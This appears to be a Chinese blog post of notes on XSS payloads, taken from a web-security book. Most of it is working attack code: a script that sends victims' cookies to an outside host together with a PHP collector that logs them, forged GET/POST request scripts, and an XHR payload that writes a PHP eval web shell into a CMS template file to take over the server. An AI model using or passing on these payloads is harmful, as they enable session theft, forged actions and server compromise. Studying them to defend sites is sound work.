xss payload

xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等。

1.盗取cookie,发起cookie劫持

使用xss漏洞插入cookie.js

cookie.js代码:

 

1 var img = document.createElement("img");
2  
3 img.src = "http://lanu.sinaapp.com/cookie.php?cookie="+escape(document.cookie);
4  
5 document.body.appendChild(img);

 

cookie.php代码

 

1 <?php
2  
3     $file = fopen("cookie.txt","a");
4  
5     fwrite($file,$_GET['cookie']);
6  
7     fclose($file);
8  
9 ?>

 

2.构造GET和POST请求

get.js代码:

 

1 var img = document.createElement("img");
2  
3 img.src = "一个可以使用的get请求链接";
4  
5 document.body.appendChild(img);

 

post.js代码:

代码1:(DOM节点方式)

 

01 var f = document.createElement("form");
02  
03 f.action ="";
04  
05 f.method = "post";
06  
07 document.body.appendChild(f);
08  
09 var i1 = document.createElement("input");
10  
11 i1.name = "xxx";
12  
13 i1.value = "xxxx";
14  
15 f.appendChild(i1);
16  
17 var i2 = document.createElement("input");
18  
19 i2.name = "aaa";
20  
21 i2.value = "aaa";
22  
23 f.appendChild(i2);
24  
25 f.submit();

 

代码2:

 

1 var dd = document.createElement("div");
2  
3 document.body.appendChild(dd);
4  
5 dd.innerHTML ='<form action="" method="post" id="xssform" name="mbform">'+'<input type="hidden" value="xxxx" name="xxx" />'+'<input type="text" value="aaaa" name="aaa" />'+'</form>';
6  
7 document.getElementById("xssform").submit();

 

代码3:(使用XMLHttpRequest)

 

01 var url = "http://lanu.sinaapp.com";
02  
03 var postStr = "aaa=aaaa&xxx=xxxx";
04  
05 var ajax = null;
06  
07 if(window.XMLHttpRequest)
08  
09 {
10  
11     ajax = new XMLHttpRequest();
12  
13 }
14  
15 else if(window.ActiveXObject)
16  
17 {
18  
19     ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本
20  
21 }
22  
23 else
24  
25 {
26  
27     return;
28  
29 }
30  
31 ajax.open("POST", url , true);
32  
33 ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
34  
35 ajax.send(postStr);
36  
37 //ajax.open("GET", url, true);
38  
39 //ajax.send(null);
40  
41 ajax.onreadystatechange = function()
42  
43 {
44  
45     if(ajax.readyState == 4 && ajax.status == 200)
46  
47     {
48  
49         //alert("Done!");
50  
51     }
52  
53 }

-------------------

3.xss钓鱼

4.浏览器识别和用户安装软件识别

http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/

5.css history hack

http://ha.ckers.org/weird/CSS-history-hack.html

 

读《白帽子讲web安全》笔记

---------------------

xxs payload getshell 实例:

骑士cms getshell

 

01 //构造好的能写入一句话的连接
02  
03 var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6';
04  
05 try
06  
07 {
08  
09 //调用XMLHttpRequest
10     var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP'));
11  
12     xml.open("POST",'admin_templates.php?act=do_edit',false);
13     xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
14     xml.onreadystatechange = function()
15     {
16         if(xml.readyState == 4)
17  
18         {
19  
20         }
21     }
22     xml.send(Shelldata);
23 }
24 catch(e)
25  
26 {
27  
28 }

你可能感兴趣的:(load)